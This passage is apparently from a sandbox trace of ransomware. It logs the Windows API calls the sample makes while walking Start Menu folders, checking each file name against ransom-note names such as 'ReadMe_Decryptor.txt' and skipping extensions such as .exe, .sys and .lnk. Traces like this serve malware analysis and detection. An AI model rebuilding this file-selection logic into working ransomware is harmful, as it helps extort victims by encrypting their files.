returned 1 [0084.944] lstrcmpW (lpString1="Run.lnk", lpString2="..") returned 1 [0084.944] lstrcmpiW (lpString1="Run.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.944] lstrcmpiW (lpString1="Run.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.944] PathFindExtensionW (pszPath="Run.lnk") returned=".lnk" [0084.944] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.944] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.945] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.945] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0084.945] lstrcmpW (lpString1="System Tools", lpString2=".") returned 1 [0084.945] lstrcmpW (lpString1="System Tools", lpString2="..") returned 1 [0084.945] lstrlenW (lpString="System Tools") returned 12 [0084.945] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="System Tools" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools" [0084.945] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0084.945] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0084.945] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x781110 [0084.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.946] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.946] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0084.946] lstrcmpW (lpString1="computer.lnk", lpString2=".") returned 1 [0084.946] lstrcmpW (lpString1="computer.lnk", lpString2="..") returned 1 [0084.946] lstrcmpiW (lpString1="computer.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.946] lstrcmpiW (lpString1="computer.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.946] PathFindExtensionW (pszPath="computer.lnk") returned=".lnk" [0084.946] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.946] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.946] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.946] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e084aaf, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Control Panel.lnk", cAlternateFileName="CONTRO~1.LNK")) returned 1 [0084.946] lstrcmpW (lpString1="Control Panel.lnk", lpString2=".") returned 1 [0084.946] lstrcmpW (lpString1="Control Panel.lnk", lpString2="..") returned 1 [0084.946] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.946] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.947] PathFindExtensionW (pszPath="Control Panel.lnk") returned=".lnk" [0084.947] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.947] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.947] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.947] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0084.947] lstrcmpW (lpString1="Desktop.ini", lpString2=".") returned 1 [0084.947] lstrcmpW (lpString1="Desktop.ini", lpString2="..") returned 1 [0084.947] lstrcmpiW (lpString1="Desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.947] lstrcmpiW (lpString1="Desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.947] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0084.947] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.947] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.947] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.947] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.947] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.947] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (No Add-ons).lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0084.947] lstrcmpW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".") returned 1 [0084.947] lstrcmpW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="..") returned 1 [0084.947] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.947] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.947] PathFindExtensionW (pszPath="Internet Explorer (No Add-ons).lnk") returned=".lnk" [0084.948] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.948] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.948] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.948] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1 [0084.948] lstrcmpW (lpString1="Private Character Editor.lnk", lpString2=".") returned 1 [0084.948] lstrcmpW (lpString1="Private Character Editor.lnk", lpString2="..") returned 1 [0084.948] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.948] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.948] PathFindExtensionW (pszPath="Private Character Editor.lnk") returned=".lnk" [0084.948] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.948] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.948] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.948] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 0 [0084.948] FindClose (in: hFindFile=0x781110 | out: hFindFile=0x781110) returned 1 [0084.948] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0084.948] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2=".") returned 1 [0084.949] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="..") returned 1 [0084.949] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.949] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.949] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0084.949] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.949] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.949] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.949] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0084.949] FindClose (in: hFindFile=0x7810d0 | out: hFindFile=0x7810d0) returned 1 [0084.949] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0084.949] lstrcmpW (lpString1="Administrative Tools", lpString2=".") returned 1 [0084.949] lstrcmpW (lpString1="Administrative Tools", lpString2="..") returned 1 [0084.949] lstrlenW (lpString="Administrative Tools") returned 20 [0084.949] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Administrative Tools" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0084.949] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0084.949] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0084.949] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0084.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.950] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.950] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.950] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.950] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0084.950] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0084.950] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.950] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.950] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0084.950] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.950] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.950] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.950] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.950] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.950] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0084.950] FindClose (in: hFindFile=0x7810d0 | out: hFindFile=0x7810d0) returned 1 [0084.951] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.951] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0084.951] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0084.951] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.951] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.951] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0084.951] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.951] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.951] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.951] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.951] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.951] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0084.951] lstrcmpW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".") returned 1 [0084.951] lstrcmpW (lpString1="Internet Explorer (64-bit).lnk", lpString2="..") returned 1 [0084.951] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.951] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.951] PathFindExtensionW (pszPath="Internet Explorer (64-bit).lnk") returned=".lnk" [0084.951] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.951] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.952] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.952] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d7ae880, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0084.952] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2=".") returned 1 [0084.952] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="..") returned 1 [0084.952] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.952] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.952] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0084.952] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.952] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.952] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.952] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0084.952] lstrcmpW (lpString1="Maintenance", lpString2=".") returned 1 [0084.952] lstrcmpW (lpString1="Maintenance", lpString2="..") returned 1 [0084.952] lstrlenW (lpString="Maintenance") returned 11 [0084.952] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Maintenance" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0084.952] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0084.952] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0084.953] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0084.953] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.953] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.953] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.953] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0084.953] lstrcmpW (lpString1="Desktop.ini", lpString2=".") returned 1 [0084.953] lstrcmpW (lpString1="Desktop.ini", lpString2="..") returned 1 [0084.953] lstrcmpiW (lpString1="Desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.953] lstrcmpiW (lpString1="Desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.953] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0084.953] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.953] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.953] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.953] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.953] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.953] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 1 [0084.953] lstrcmpW (lpString1="Help.lnk", lpString2=".") returned 1 [0084.954] lstrcmpW (lpString1="Help.lnk", lpString2="..") returned 1 [0084.954] lstrcmpiW (lpString1="Help.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.954] lstrcmpiW (lpString1="Help.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.954] PathFindExtensionW (pszPath="Help.lnk") returned=".lnk" [0084.954] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.954] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.954] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.954] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 0 [0084.954] FindClose (in: hFindFile=0x7810d0 | out: hFindFile=0x7810d0) returned 1 